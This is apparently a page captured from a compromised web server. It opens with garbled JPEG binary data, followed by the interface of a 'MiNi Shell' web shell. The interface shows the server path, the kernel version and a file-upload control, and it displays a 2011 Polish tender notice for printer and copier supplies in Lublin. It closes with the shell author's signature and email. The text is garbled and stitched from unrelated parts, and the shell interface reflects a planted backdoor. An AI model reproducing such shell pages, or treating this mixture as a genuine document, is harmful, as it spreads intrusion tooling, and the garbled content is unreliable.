JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110314/82637-N-2011.html

<p class="kh_header"><b>Lublin: dostawa materiałów ekspoatacyjnych do drukarek, kserokopiarek i faksów</b><br>
<b>Numer ogłoszenia: 82637 - 2011; data zamieszczenia: 14.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej , ul. Tomasza Zana 38, 20-601 Lublin, woj. lubelskie, tel. 81 528 76 50, faks 81 528 76 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa materiałów ekspoatacyjnych do drukarek, kserokopiarek i faksów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Na przedmiot zamówienia składa sie dostawa, rozładunek i wniesienie materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów do pomieszczeń wskazanych przez Zamawiającego oraz odbiór (raz na kwartał) po wykorzystaniu przez Zamawiającego zużytych artykułów eksploatacyjnych.
2.	Artykuły eksploatacyjne muszą być:
	Fabrycznie nowe- Zamawiający pod tym terminem rozumie artykuły bez śladów używania i uszkodzenia, pełnowartościowe, nie regenowane, nie refabrykowane i do których produkcji zostały wykorzystane wyłacznie elementy/półprodukty w 100% nowe, nie pochodzace z recyklingu, nie refabrykowane, bez śladów poprzedniego używania i uszkodzenia, nie regenerowane, nie wchodzace wcześniej w części ani całości w skład innych artykułów
	Oryginalne - Zamawiający pod tym terminem rozumie materiały eksploatacyjne wyprodukowane przez producentów urzadzeń, w których mają byc stosowane, nie będące naśladownictwem lub przeróbką
4.	Zamawiający dopuszcza składanie ofert równoważnych. Za ofertę równoważną Zamawiający będzie uważał  materiały eksploatacyjne faktycznie nowe, czyli przy ich produkcji musi być wykorzystane 100% nowych części, w pełni kompatybilne ze sprzętem, do którego są zamówione, których jakość, parametry techniczne, w tym wydajność jest co najmniej taka sama, jak materiałów oryginalnych. Żadna z części np. cartridge lub toner , obudowa, listwa podajaca, listwa zbierająca, wałek magnetyczny, głowica drukujaca, atrament, tusz oraz pozostałe części nie były wykorzystane w formie pierwotnej w całości lub części w innym produkcie. Materiały nie moga mieć śladów poprzedniego używania i uszkodzenia, nie regenerowane, nie prefabrykowane pochodzące z bieżącej produkcji. Nie naruszające prawa lub rozwiązań patentowych innych produktów. W przypadku zaoferowania  artykułu równoważnego w formularzu cenowym, stanowiącym załącznik 1 do SIWZ należy wpisać nazwę oferowanego asortymentu.
5.	Dostarczone materiały eksploatacyjne musza być umieszczone w fabrycznie oznakowanych opakowaniach umożliwiających identyfikację z oznaczeniem producenta wraz z symbolem materiału eksploatacyjnego oraz przeznaczeniem, szczelnie zamknięte.
6.	Zamawiający nie dopuszcza dostarczenia materiałów eksploatacyjnych regenerowanych, ani refabrykowanych.
8.	Udowodnienie równoważności materiałów eksploatacyjnych leży po stronie Wykonawcy . Wykonawca składający ofertę na materiały eksploatacyjne równoważne zobowiązany jest w pisac w tabeli formularza ofertowego nazwę, oznaczenie, wydajność oraz producenta materiału równoważnego.
9.	W przypadku gdy produkt oryginalny posiada pamięć i procesor przekazujący informację o stanie zużycia tuszu i tonera należy dostarczyć oświadczenie, że produkt równoważny posiada układ analogicznie działający do wyżej wymienionego.
9.	Odpowiedzialność finansowa za naprawy gwarancyjne urządzeń drukujących zwiażane z uszkodzeniami powstałymi w wyniku zastosowania materiału równoważnego innego producenta niż zalecanego przez producenta urządzeń spoczywa na Wykonawcy. Wynika to z okoliczności, że Zamawiający traci prawo do dokonania nieodpłatnej naprawy urządzenia w okresie gwarancji w przypadku uszkodzenia powstałego na skutek stosowania niewłaściwych , nieoryginalnych lub niekompatybilnych materiałów ekspoatacyjnych, które nie są objęte gwarancją producenta urządzeń drukujących.
10.	Termin ważności oferowanego asortymentu wynosi min 12 miesięcy od daty dostarczenia do siedziby Zamawiającego.


Lp.	Przedmiot zamówienia                                   jm.	      Zapotrzebowana ilość

1.		Tusz czarny do HP Officejet PRO 8500	szt	7
2.		Tusz żółty do  HP Officejet PRO 8500	szt	4
3.		Tusz różowy do HP Officejet 8500	         szt	3
4.		Tusz niebeiski do HP Officejet PRO 8500	szt	4
5.		Toner czarny do HP Color LJ CP 2025	szt	12
6.		Toner kolorowy (komplet) do HP Color LJ CP 2025	szt	10
7.		Tusz czarny do HP Vivera H470	szt	6
8.		Tusz kolorowy do HP Vivera H470	szt	6
9.		Toner czarny do  OKI C5650	szt	8
10.		Bęben czarny do  OKI C5650	szt	2
11.		Toner kolorowy K do OKI C5650	szt	8
12.		Bęben kolorowy K do OKI C5650	szt	2
13.		Toner kolorowy Y do OKI C5650	szt	8
14.		Bęben kolorowy Y do  OKI C5650	szt	2
15.		Toner kolorowy M do OKI C5650	szt	8
16.		Bęben kolorowy M do  OKI C5650	szt	2
17.		Pas transferu do  OKI C5650	Szt	1
18.		Toner czarny do  Lexmark C736dn	Szt	3
19.		Toner różowy do  Lexmark C736dn	Szt	2
20.		Toner niebieski do Lexmark C736dn	Szt	3
21.		Toner żółty do Lexmark C 736dn	Szt	1
22.		Bęben do Lexmark C736dn	Szt	4
23.		Toner różowy do Xerox 7120 Workcentre	Szt	2
24.		Toner niebieski do Xerox 7120 Workcentre	Szt	2
25.		Toner czarny do HP Color LaseJet 2600n	Szt	2
26.		Toner żółty do HP Color LaserJet 2600n	Szt	2
27.		Toner niebieski do HP Color LaserJet 2600n	Szt	2
28.		Toner różówy do HP ColorJet 2600n	Szt	2
29.		Toner czarny do OKI C5100	Szt	9
30.		Bęben czarny do OKI C5100	Szt	2
31.		Toner do OKI C5100 K	Szt	4
32.		Bęben do OKI C5100 K	Szt	1
33.		Toner do OKI C5100 Y	Szt	4
34.		Bęben do OKI C5100 Y	Szt	1
35.		Toner do OKI C5100 M	Szt	5
36.		Bęben do OKI C5100 M	Szt	1
37.		Pas transferu do OKI C5100	Szt	1
38.		Grzałka do OKI C5100	Szt	1
39.		Toner do Panasonic Workio 8020	Szt	4
40.		Toner do HP LaserJet 3005dn	Szt	9
41.		Toner czarny do HP Inkjet 2800	Szt	7
42.		Toner różowy do HP Inkjet 2800	Szt	6
43.		Toner niebieski do HP Inkjet 2800	Szt	6
44.		Toner żółty do HP Inkjet 2800	Szt	6
45.		Toner czarny do Brother HL4050	Szt	4
46.		Toner kolorowy (komplet)do Brother HL4050	Szt	3
47.		Tusz czarny do HP Deskjet 930C	Szt	4
48.		Tusz kolorowy do HP Deskjet 930C	Szt	4
49.		Toner do HP Laserjet 2015dn	Szt	8
50.		Toner do Samsung SCX 4824FN	Szt	5
51.		Toner czarny do HP Color Laserjet CP3525dn	Szt	4
52.		Toner kolorowy (komplet) do HP Color Laserjet CP3525dn	Szt	2
53.		Toner żółty do HP Color Laserjet CP3525dn	Szt	1
54.		Toner różowy do HP Color Laserjet CP3525dn	Szt	1
55.		Toner niebieski do HP Clor Laserjet CP 3525dn	Szt	1
56.		Toner czarny do Brother MFC-9840CDW	Szt	10
57.		Bęben do Brother MFC-9840CDW	Szt	3
58.		Pas transferu do Brother MFC-9840CDW	Szt	1
59.		Toner kolor (komplet)do Brother MFC-9840CDW	Szt	2
60.		Bęben żółty do Brother MFC 9840CDW	Szt	1
61.		Tusz czarny do HP Deskjet 1120C	Szt	2
62.		Toner do Workio 1820	Szt	3
63.		Tusz czarny do HP Officejet 7310	Szt	5
64.		Tusz kolorowy do HP officejet 7310	Szt	3
65.		Tusz czarny do HP 920C	Szt	5
66.		Tusz kolorowy do HP 920C	Szt	2
67.		Tusz czarny do HP Officejet 7130	Szt	4
68.		Tusz kolorowy do HP Officejet 7130	Szt	4
69.		Toner do Hp Laserjet 1018	Szt	2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-5, 30.12.51.20-8, 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie żąda wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. W przypadku zaoferowania materiałów eksploatacyjnych równoważnych Wykonawca dołącza oświadczenie, że materiały ekspoatacyjne posiadają certyfikat ISO/IEC 19725 w języku polskim
2. W przypadku zaoferowania materiałów eksploatacyjnych równoważnych , których odpowiedniki  oryginalne mają pamięć Wykonawca dołącza oświadczenie o posiadaniu takich elementów  przez asortyment równoważny</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zmiany zakresu rzeczowego dostaw mogą nastąpić w przypadkach, których Zamawiający nie mógł przewidzieć w chwili podpisywania umowy, a w szczególności:
-	definitywnego wycofania przedmiotu umowy  z obrotu; 
-	zmiana sposobu konfekcjonowania, postaci przedmiotu umowy; 
-	zawieszenie produkcji przedmiotu umowy na okres powyżej 3miesięcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej
20-601 Lublin ul. Zana 38
pokój 417.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2011 godzina 10:00, miejsce: Regionalny Ośrodek Polityki Społecznej
20-601 Lublin ul. Zana 38
VI piętro SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 4.	Część przedmiotu zamówienia przeznaczona jest na realizację Projektu Systemowego : Szkolenie  i doradztwo podnoszące kwalifikację pracowników instytucji pomocy i integracji społecznej w ramach Priorytetu VII Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałanie  7.1.3 Podnoszenie kwalifikacji kadr pracowników instytucji pomocy i integracji społecznej realizowanego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Europejski Fundusz Społeczny oraz Projektu Systemowego Koordynacja na rzecz aktywnej integracji, Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Priorytet I Zatrudnienie i integracja społeczna Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com